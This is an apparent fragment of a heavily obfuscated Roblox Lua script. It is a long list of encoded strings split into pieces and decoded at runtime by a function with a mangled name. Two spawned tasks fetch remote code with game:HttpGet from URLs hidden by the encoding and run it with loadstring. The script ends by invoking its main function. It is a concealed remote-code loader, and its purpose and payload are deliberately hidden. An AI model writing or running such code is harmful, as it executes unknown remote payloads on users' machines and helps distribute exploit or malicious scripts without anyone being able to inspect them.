  _OlIlI0lIIIll("su0iuDrh".."1+4".."NML99je".."Ehvw=="),
  _OlIlI0lIIIll("vew".."osH/Oh".."cwOIapr".."n+As".."tC3s"),
  _OlIlI0lIIIll("vOUhuj".."r/nsMNc".."4hpjvQ4".."tTzk".."mcw".."="),
  _OlIlI0lIIIll("s/E".."guzb".."i1/8NI".."7thivAi"),
  _OlIlI0lIIIll("ruE".."jsSrkmc".."JMEK".."Rrkfcku".."DA="),
  _OlIlI0lIIIll("vewkuy".."/smdcFP".."aIo".."vOUj".."tzHkmc".."Q="),
  _OlIlI0lIIIll("qesgtDC".."tpcIAP6".."Q="),
  _OlIlI0lIIIll("ruE".."jsS".."rkmY0".."4Ia5t"),
  _OlIlI0lIIIll("uus".."k9hvino".."0oP".."A=="),
  _OlIlI0lIIIll("reUh".."tzLkmc".."JMA6".."5mmf".."Eku".."DA="),
  _OlIlI0lIIIll("uPYisT7".."5mI08O".."rlpius="),
  _OlIlI0lIIIll("s+U".."jsTDh".."nsMFc5t".."pjPYi".."tTb".."jng=="),
  _OlIlI0lIIIll("v/I".."itT7".."pnsM".."Fc4x".."9mOIi"),
  _OlIlI0lIIIll("qu1tgj".."ato8".."RMA".."Kpgi/Y="),
  _OlIlI0lIIIll("vPE/t".."D7h".."mMM".."Fc4".."dnku0".."huTPk"),
  _OlIlI0lIIIll("vPY/v".."3/Phd8Fc".."4lhnf".."E+9h".."vklNgfc4".."lnk+Y".."ktS".."r+"),
  _OlIlI0lIIIll("ruE/uT".."zlks".."EAPOtE".."m+kiuD".."zlksEA".."PA=="),
  _OlIlI0lIIIll("vOUjtz".."Hkg8".."xMF6Rkj".."uwku".."Db5l".."g=="),
  _OlIlI0lIIIll("s+UhtzLo".."1+w".."BMr".."ltkuE="),
  _OlIlI0lIIIll("vOUgtDbj".."no0vIaR".."7iu0jvw=".."="),
  _OlIlI0lIIIll("qvY4ujbg".."kt8Dc5".."96i+gktT".."bjl".."g=="),
  _OlIlI0lIIIll("v/IitT7".."pnsMFc4".."pmiu".."0huS".."/kmcQ".."="),
  _OlIlI0lIIIll("vPY/".."9h3/hY0".."8Mr9".."pju0".."g"),
  _OlIlI0lIIIll("vOUjsj".."b5mI0".."tK6Rkl/A".."i"),
  _OlIlI0lIIIll("veU9p".."irulM".."QCPO".."tJjfcsp".."SzkmcI".."="),
  _OlIlI0lIIIll("ru0".."jsz7h".."mNkYPOt".."OjPE".."5oj".."7/nsMD"),
  _OlIlI0lIIIll("ru09v".."3/M".."gcIPMq9".."n"),
  _OlIlI0lIIIll("uPY".."isT".."CtssEKP".."A=="),
  _OlIlI0lIIIll("qvYktX/Z".."hcw".."Pc4".."lpjOU".."vuTDg"),
  _OlIlI0lIIIll("vfE9tT".."7mk".."o0n".."PKpknw=="),
  _OlIlI0lIIIll("quVtgj".."6to8xMB".."6oor".."eUloy0="),
  _OlIlI0lIIIll("veUu".."ojCt".."v8Qc".."PLtniu".."UguQ=="),
  _OlIlI0lIIIll("vOsjszz".."s1+".."wBM".."apkn+Y4"),
  _OlIlI0lIIIll("vOUjsjb5".."mI0uP".."Kl6l/A5".."uQ=="),
  _OlIlI0lIIIll("ueUjsSz".."5kt9MFa".."RniuE".."/tw=="),
  _OlIlI0lIIIll("qvYkpi".."/k1/keP".."Lt4lw".."=="),
  _OlIlI0lIIIll("ru09v3/".."OmN8CO".."g=="),
  _OlIlI0lIIIll("ru09v3/G".."ntoF"),
  _OlIlI0lIIIll("quU/oj7/".."lsoCP".."A=="),
  _OlIlI0lIIIll("rOU".."utT".."DimcRMGa".."pmmu".."Ehv".."zHk"),
  _OlIlI0lIIIll("sOsitDb".."jno0".."/Mq".."V8n+oku".."DY="),
  _OlIlI0lIIIll("rfIkuDb".."jlo0uPK".."Zqn/Ypv".."zHi"),
  _OlIlI0lIIIll("quU".."hpj6t".."s8RM".."Fa56kQ=".."="),
  _OlIlI0lIIIll("uOg4pD".."brm9g".."eMg=="),
  _OlIlI0lIIIll("qu0".."g9hzlksg".."fNg=="),
  _OlIlI0lIIIll("su0/v".."zNh1".."+ENI".."aJkHg".."=="),
  _OlIlI0lIIIll("sOs".."itDbjn".."o08OrFyn".."+okuDY=")
}

task.spawn(function()
loadstring(game:HttpGet(_OlIlI0lIIIll("lvA".."5piy32II".."NI6ImkvE".."spD".."LihYMC".."Nr8nmO0h".."syyi".."gZlDP6".."RpmuE/p".."XC1x5U".."KZ6psyuE".."vsDm".."5wJgPZvx".."rm7J8s".."z6+zshYY".."q46zaoho".."z4=")))()
end)

task.spawn(function()
loadstring(game:HttpGet(_OlIlI0lIIIll("lvA".."5pi".."y32IIcMr".."h8m/djv".."zCihcwbf".."L05zrRg".."viv5h9".."5Ba".."/owx".."rI=")))()
end)

end
local _OOIOIIOl0l=(117*9540>117) and _l0II0IIIlI or nil
if _OOIOIIOl0l then _OOIOIIOl0l() end
